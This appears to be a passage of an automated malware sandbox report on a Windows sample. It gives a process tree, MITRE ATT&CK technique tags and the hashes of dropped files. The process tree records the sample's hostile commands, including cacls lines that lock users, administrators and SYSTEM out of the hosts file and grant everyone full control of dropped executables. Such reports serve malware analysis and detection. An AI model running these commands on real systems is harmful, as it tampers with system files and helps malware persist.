    cmd: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    C:\Windows\SysWOW64\cmd.exe (PID 5564)
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 4336)
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    C:\Windows\SysWOW64\cmd.exe (PID 5836)
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 5896)
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    C:\Windows\SysWOW64\cmd.exe (PID 5324)
      cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    C:\Windows\SysWOW64\cacls.exe (PID 5956)
      cmd: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

C:\Windows\SysWOW64\tyxtue.exe (PID 3860)
  cmd: C:\Windows\SysWOW64\tyxtue.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE (PID 64)
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F
  C:\Windows\system32\cmd.exe (PID 2492)
    cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe (PID 2328)
    cmd: cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F

C:\Windows\system32\cmd.EXE (PID 1620)
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F
  C:\Windows\system32\cmd.exe (PID 4268)
    cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe (PID 2252)
    cmd: cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F

C:\Windows\system32\cmd.EXE (PID 1928)
  cmd: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbleyvb.exe
  C:\Windows\ime\bbleyvb.exe (PID 4224)
    cmd: C:\Windows\ime\bbleyvb.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

C:\Windows\system32\cmd.EXE (PID 2788)
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F
  C:\Windows\system32\cmd.exe (PID 4440)
    cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe (PID 4040)
    cmd: cacls C:\Windows\TEMP\urfucfzpe\ecfkkq.exe /p everyone:F

C:\Windows\system32\cmd.EXE (PID 5516)
  cmd: C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F
  C:\Windows\system32\cmd.exe (PID 5528)
    cmd: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  C:\Windows\system32\cacls.exe (PID 5268)
    cmd: cacls C:\Windows\kmydietv\bbleyvb.exe /p everyone:F

C:\Windows\system32\cmd.EXE (PID 5496)
  cmd: C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbleyvb.exe
  C:\Windows\ime\bbleyvb.exe (PID 6004)
    cmd: C:\Windows\ime\bbleyvb.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (1)
Downloads
-
Filesize: 95KB
MD5: 86316be34481c1ed5b792169312673fd
SHA1: 6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA256: 49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA512: 3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize: 275KB
MD5: 4633b298d57014627831ccac89a2c50b
SHA1: e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256: b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA512: 29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize: 33.9MB
MD5: 73eef69287f3d26daa7d50bfc6a05cfd
SHA1: 2c8e6ede811bd685bf797b05ce80e18b8691a6f6
SHA256: 22af18dbed7a4a73bb3b246d48a9662193d852b40f72a3d9d492eb45b1ba31f5
SHA512: 8a8318d8ab58eb33509ae6eddf0abe8bbaceb9d8c866afd676d490b40190eae63da402217efad0c14a84c081184e6fc12ab951fb4423ca22812e03643539d7be
-
Filesize: 25.7MB
MD5: 20982ea600d926e404c6878941476bf9
SHA1: c04c3907bf3106ded5a15d84a85f4951e27690d2
SHA256: 616af3e5f9f447b8bddb59db13678afe12064327d1934d04a08e7e853d69eea2
SHA512: b8483732cee10ff9d8003ec0f4cb043d3b8f33740242deade79c021dc56e1f55d1c90827b3dfd093fd3b2ee3e5b2e4e008d2fdce49948abd2cb45dcf3578dfb9
-
Filesize: 4.2MB
MD5: 001686aba6c206927c91bcb58a03f367
SHA1: c7d5be9c2b6bf31674bd590a1287734cfa0db202
SHA256: 20f20ff7b28cf91cf21eb3bd721056d526a7df0b1976f273c2c80e8957243056
SHA512: 1e7ed5c9548ea789703be4d26916de64c23a633b6adf7db748d81609d45a1c1c3e0201f7fdd34e0c289d80d8544ad1f681cb9a6b7677e84f1607d3a43b9ebedd
-
Filesize: 44.5MB
MD5: f25a3159a6ae64150930332a5112245f
SHA1: a4457a7ed33d7fda565d0bc15c354f49fddb6f03
SHA256: 8aac42cfd8db6a4afe49a24aea4f2024e8c7a1c0fc4dfa8b9a80ae27ff2a0897
SHA512: 85acde582a32aa2cf88993bc9d3d2b5d2104e6e45786ef97c3507e6e9d710ae0bc3642f4a844b2ff05bc10220d7a2b06ccb2d0ad438a6160e20f181201d611cc
-
Filesize: 3.7MB
MD5: 509c89ad074a177fcd93c8ca7da9e0b5
SHA1: c5adf65b8a0b93a7eca2a580bcd39c4ec8212c08
SHA256: 1aef6babade5d6db13122b9b20975a85ded76e2f8617f722681174d314221564
SHA512: 325a92fda9760265c9a4921e7d3377caeb2180680e5cabe8fd23cb17a5628920a86b300593977010f9d1ec6bd33eef196fe802f6ad6910421a53ac694cbb6f84
-
Filesize: 1.2MB
MD5: 2458b470af38c0ac8c3668c81fd1aee1
SHA1: 1e83b9f9f104100d47ae793853e7c5251b3f48e1
SHA256: 0ec3230aa079da05dbc0995b81d4d985f5c9f7d5ce2c9334349937756f3b6165
SHA512: fe04421b8f29683f41b4dc3de9519ad5d14dcc1e40613ddf1c028bcb56e4602f82f2b11979d224837d6a300fb96097054efa7c7818c89a4237e93d7b09da4632
-
Filesize: 7.7MB
MD5: 7b8f18e3bf210991fa6064e0176b9651
SHA1: 68a334917d908c72b652acb7c4e482382f14876c
SHA256: 313dd1c5a498f1db747d77594d4889644dfde21c51e8ac82b5a446e3ca11c645
SHA512: 1439e3d7a41eef0bb0ccaebf287494bc63f3f7c518c1d99b69b8d208109f67832da07037d0ca9c6d08c180b4bbb5d21b1ebe4cc90f9db92b89221686adb408a9
-
Filesize: 3.0MB
MD5: 381c50ea4b86d1ff95ec292baa04f090
SHA1: b874c4d31a736fcb69a82c955cf697fbb71c69bd
SHA256: a462f238b2d87aad9596ec1da393f1298f395c1fc406178399cb9ac99b9a61f0
SHA512: dd68eaf7e56833973e57a195a216c09461502c3dbc4e6832a6a718d5c3b209f6bb82c6f1172cae17fbd670c947fedb6d576fd12e5ceade49265fd1d65e888992
-
Filesize: 826KB
MD5: 89c99c51bb9c6043a234c6a1b6461441
SHA1: 1e6f72cabadc60611d2f408ff01284a041ca3599
SHA256: a9cc5856573fe489876c96f6ccc0f3d69be9685ebac7fed56a793005176cefe6
SHA512: b92a77e34c12dddd353e4fafe82d29439284b5125d212f45a6c633d2bea7f9b0a23bcdc26aa1ef59a2c30a33c590edd3e6d1a941d81d996555480fb1e10ab024
-
Filesize: 2.5MB
MD5: af0bf682effb629d7ae7f935f4be318a
SHA1: 3ada0323345b83ebf89a56e43e8f0bc7da957d4e
SHA256: ed2d50847bbb95a17f4ae7f89722e8ba295f9cdc74c3bf37705534af6d5a8592
SHA512: a7c9536824916d23f569ec42d4c54ffd587d6f706fb6302914bc81e9233235b0d5ba568b8917f902f24e87e6be3e1dccb2255fdadfeb152dd0432efdcb75b460
-
Filesize: 20.5MB
MD5: c16ef9a90b2668d9aa2d17f08c851300
SHA1: e902285ac7a0c28e2951ae0c49074a13d57053cc
SHA256: 0d52bf7f2890c51460b4de38dcbe5983d5289d8575d7ace335fe3e7666834ab6
SHA512: e25559f6d28dfe0790ab221e138016acf9cfe4f247c697a8401db5b2633cf65391c2d726440d66d6dead6c11b31279e19278d1a82f5054ca7e8f6dc16e0517a0
-
Filesize: 4.1MB
MD5: 7e6d216b511e215002af9943f0c8b08c
SHA1: 9210003e5c08e5cd52523d47820b4cbebe3dcda3
SHA256: 8079931013a63747261c854d36b65473ca0be31ba49b5cddd790f1086910ee39
SHA512: 349239a20d355d09f8a5a23a366f75930b6e2bce4403b836771045973912398b56f42abf1355d3cf20685f855b6a6dfcb490a7e68a1d0ef992bfffdc67346fdf
-
Filesize: 8.7MB
MD5: 69c1b8071e2521b7168bda04c9da4f95
SHA1: 0777e5b1f27b6f2011405fc98593b090ed2cdab0
SHA256: c1184d56014591600d534a1d74fd8aee86ae73a48f10da8db91adfcdd37752a5
SHA512: af080f19deba580de4ef67f689ac25597ff5525eb484c51f1cec7022c581f6a43135fab7340b1f2be684d4e1c880afc991c373794beee537430600aaf39097cf
-
Filesize: 1.9MB
MD5: a6a8fab1ca8eb6a1a3b687cff9713938
SHA1: 0fe59737630490f267f62df394faf014a6616b96
SHA256: 573dc94720d303e4b2200b70676a8085d3663f8f130993fbefd809babb4117b7
SHA512: 7feb7807f0eb613ad695e81cc4327e98fc2a096ef71fff47a805d1f4341531488625045b8523e9bbc0e207e7c60432579b9f708695b839439c0897719d98252c
-
Filesize: 693B
MD5: f2d396833af4aea7b9afde89593ca56e
SHA1: 08d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256: d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA512: 2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize: 11KB
MD5: 2ae993a2ffec0c137eb51c8832691bcb
SHA1: 98e0b37b7c14890f8a599f35678af5e9435906e1
SHA256: 681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA512: 2501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize: 6KB
MD5: b648c78981c02c434d6a04d4422a6198
SHA1: 74d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA256: 3e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512: 219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize: 126KB
MD5: e8d45731654929413d79b3818d6a5011
SHA1: 23579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256: a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512: df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize: 343KB
MD5: 2b4ac7b362261cb3f6f9583751708064
SHA1: b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256: a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512: c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize: 72KB
MD5: cbefa7108d0cf4186cdf3a82d6db80cd
SHA1: 73aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA256: 7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512: b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize: 10.9MB
MD5: 6ff8fd0e778f2eec0fd8273c9b960d83
SHA1: f66353d9930567bd820c70c3994127b70448ca32
SHA256: 4a033c7f18b48fb0c15467aa708dfd43629028f3fdf193f7ae699d299031cbfb
SHA512: 24d69e56666f970953d460e0fd93c0ff2107d3ed38b26b190372935d93fe1417c456d3bf5f8250f70039aeac21e0832df6bb56b890d6671824834d6ddf215692
-
Filesize: 381KB
MD5: fd5efccde59e94eec8bb2735aa577b2b
SHA1: 51aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256: 441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA512: 74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize: 332KB
MD5: ea774c81fe7b5d9708caa278cf3f3c68
SHA1: fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA256: 4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA512: 7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize: 424KB
MD5: e9c001647c67e12666f27f9984778ad6
SHA1: 51961af0a52a2cc3ff2c4149f8d7011490051977
SHA256: 7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA512: 56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize: 1KB
MD5: c838e174298c403c2bbdf3cb4bdbb597
SHA1: 70eeb7dfad9488f14351415800e67454e2b4b95b
SHA256: 1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512: c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376